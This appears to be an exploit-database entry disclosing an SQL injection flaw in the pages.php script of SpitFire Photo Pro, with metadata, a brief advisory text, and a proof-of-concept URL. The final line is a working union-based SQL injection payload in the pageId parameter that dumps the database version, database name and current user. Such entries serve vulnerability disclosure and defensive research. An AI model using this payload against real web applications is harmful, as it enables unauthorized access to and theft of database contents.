SpitFire Photo Pro - 'pages.php' SQL Injection

Author: Beenu Arora
type: webapps
platform: php
port: 
date_added: 2008-10-31  
date_updated: 2014-03-27  
verified: 1  
codes: OSVDB-106996  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 32554.txt  
source: https://www.securityfocus.com/bid/32012/info

SpitFire Photo Pro is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/sapientphoto/pages.php?pageId=6634+and+1=2+union+select+1,2,3,4,5,6,concat(version(),0x3a,database(),0x3a,user())--